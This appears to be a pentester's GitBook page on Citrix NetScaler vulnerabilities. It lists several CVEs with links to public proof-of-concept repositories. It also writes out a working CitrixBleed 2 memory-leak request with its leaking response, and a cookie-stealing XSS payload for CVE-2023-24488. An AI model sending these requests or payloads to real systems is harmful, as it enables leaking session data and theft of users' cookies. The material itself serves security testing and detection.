Citrix

Citrix Exploit

CitrixBleed 2 - CVE-2025-5777

Citrix Netscaler Memory Disclosure

How Much More Must We Bleed? - Citrix NetScaler Memory Disclosure (CitrixBleed 2 CVE-2025-5777)watchTowr Labs

Detection

POST /p/u/doAuthentication.do HTTP/1.0
Host: target
User-Agent: watchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowrwatchTowr
Content-Length: 5
Connection: keep-alive

login

Response:

HTTP/1.1 200 OK
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 1962
Cache-control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: application/vnd.citrix.authenticateresponse-1+xml; charset=utf-8
X-Citrix-Application: Receiver for Web

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<AuthenticateResponse
	xmlns="<http://citrix.com/authentication/response/1>">
	<Status>success</Status>
	<Result>more-info</Result>
	<StateContext>bG9naW5zY2hlbWE9ZGVmYXVsdA==</StateContext>
	<AuthenticationRequirements>
		<PostBack>/p/u/doAuthentication.do</PostBack>
		<CancelPostBack>/p/u/doLogoff.do</CancelPostBack>
		<CancelButtonText>Cancel</CancelButtonText>
		<Requirements>
			<Requirement>
				<Credential>
					<Type>none</Type>
				</Credential>
				<Label>
					<Type>nsg-login-heading</Type>
					<Text>nsg_loginHeading</Text>
				</Label>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>login</ID>
					<SaveID>login</SaveID>
					<Type>username</Type>
				</Credential>
				<Label>
					<Text>nsg_username</Text>
					<Type>nsg-login-label</Type>
				</Label>
				<Input>
					<Text>
						<ReadOnly>false</ReadOnly>
						<InitialValue>É|¼C÷PkÓßYsa5ÊÞÅÐ^Ð|@ºJZõ¶@¹^ì¶Uã7Kèg Oë@¼~hL1{Xövn^ÐÛ·¹8dp}°$üüÇ)7
(÷æ¾èÂpAgc¼TowrwatchTowrw</InitialValue>
						<Constraint>.+</Constraint>
					</Text>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>passwd</ID>
					<SaveID>passwd</SaveID>
					<Type>password</Type>
				</Credential>
				<Label>
					<Text>nsg_password1</Text>
					<Type>nsg-login-label</Type>
				</Label>
				<Input>
					<Text>
						<Secret>true</Secret>
						<Constraint>.+</Constraint>
					</Text>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>savecredentials</ID>
					<SaveID></SaveID>
					<Type>savecredentials</Type>
				</Credential>
				<Label>
					<Text>Remember my credentials</Text>
					<Type>plain</Type>
				</Label>
				<Input>
					<AssistiveText></AssistiveText>
					<CheckBox>
						<InitialValue>false</InitialValue>
					</CheckBox>
				</Input>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>nsg-x1-logon-button</ID>
					<Type>none</Type>
				</Credential>
				<Input>
					<Button>Log On</Button>
				</Input>
				<Label>
					<Type/>
				</Label>
			</Requirement>
			<Requirement>
				<Credential>
					<ID>l20n-error</ID>
					<SaveID></SaveID>
					<Type>none</Type>
				</Credential>
				<Label>
					<Text>Try again after some time or contact your help desk</Text>
					<Type>nsg-l20n-error</Type>
				</Label>
				<Input/>
			</Requirement>
		</Requirements>
	</AuthenticationRequirements>
</AuthenticateResponse>

PoC

GitHub - win3zz/CVE-2025-5777: CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devicesGitHub

CVE-2024-xxxx - Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE

GitHub - watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit: Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCEGitHub

CVE-2024-8068 and CVE-2024-8069

GitHub - XiaomingX/cve-2024-8069-exp-Citrix-Virtual-Apps-XEN: Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCEGitHub

CVE-2023-4966 - Citrix Bleed: Leaking Session Tokens

exploits/citrix/CVE-2023-4966/exploit.py at main · assetnote/exploitsGitHub

CVE-2023-24488

XSS and Open Redirec in Citrix ADC and Citrix Gateway

GitHub - securitycipher/CVE-2023-24488: POC for CVE-2023-24488GitHub

PoC:

/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Nuclei Template:

nuclei-templates/CVE-2023-24488.yaml at master · k00kx/nuclei-templatesGitHub

CVE-2023-3519 - Citrix ADC RCE

Citrix VPX 13.1-48.47

GitHub - BishopFox/CVE-2023-3519: RCE exploit for CVE-2023-3519GitHub

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousCisco NextCleo File Transfer

Last updated 5 months ago

HTTP/1.1 200 OK X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Content-Length: 1962 Cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: application/vnd.citrix.authenticateresponse-1+xml; charset=utf-8 X-Citrix-Application: Receiver for Web <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <AuthenticateResponse xmlns="<http://citrix.com/authentication/response/1>"> <Status>success</Status> <Result>more-info</Result> <StateContext>bG9naW5zY2hlbWE9ZGVmYXVsdA==</StateContext> <AuthenticationRequirements> <PostBack>/p/u/doAuthentication.do</PostBack> <CancelPostBack>/p/u/doLogoff.do</CancelPostBack> <CancelButtonText>Cancel</CancelButtonText> <Requirements> <Requirement> <Credential> <Type>none</Type> </Credential> <Label> <Type>nsg-login-heading</Type> <Text>nsg_loginHeading</Text> </Label> </Requirement> <Requirement> <Credential> <ID>login</ID> <SaveID>login</SaveID> <Type>username</Type> </Credential> <Label> <Text>nsg_username</Text> <Type>nsg-login-label</Type> </Label> <Input> <Text> <ReadOnly>false</ReadOnly> <InitialValue>É|¼C÷PkÓßYsa5ÊÞÅÐ^Ð|@ºJZõ¶@¹^ì¶Uã7Kèg Oë@¼~hL1{Xövn^ÐÛ·¹8dp}°$üüÇ)7 (÷æ¾èÂpAgc¼TowrwatchTowrw</InitialValue> <Constraint>.+</Constraint> </Text> </Input> </Requirement> <Requirement> <Credential> <ID>passwd</ID> <SaveID>passwd</SaveID> <Type>password</Type> </Credential> <Label> <Text>nsg_password1</Text> <Type>nsg-login-label</Type> </Label> <Input> <Text> <Secret>true</Secret> <Constraint>.+</Constraint> </Text> </Input> </Requirement> <Requirement> <Credential> <ID>savecredentials</ID> <SaveID></SaveID> <Type>savecredentials</Type> </Credential> <Label> <Text>Remember my credentials</Text> <Type>plain</Type> </Label> <Input> <AssistiveText></AssistiveText> <CheckBox> <InitialValue>false</InitialValue> </CheckBox> </Input> </Requirement> <Requirement> <Credential> <ID>nsg-x1-logon-button</ID> <Type>none</Type> </Credential> <Input> <Button>Log On</Button> </Input> <Label> <Type/> </Label> </Requirement> <Requirement> <Credential> <ID>l20n-error</ID> <SaveID></SaveID> <Type>none</Type> </Credential> <Label> <Text>Try again after some time or contact your help desk</Text> <Type>nsg-l20n-error</Type> </Label> <Input/> </Requirement> </Requirements> </AuthenticationRequirements> </AuthenticateResponse>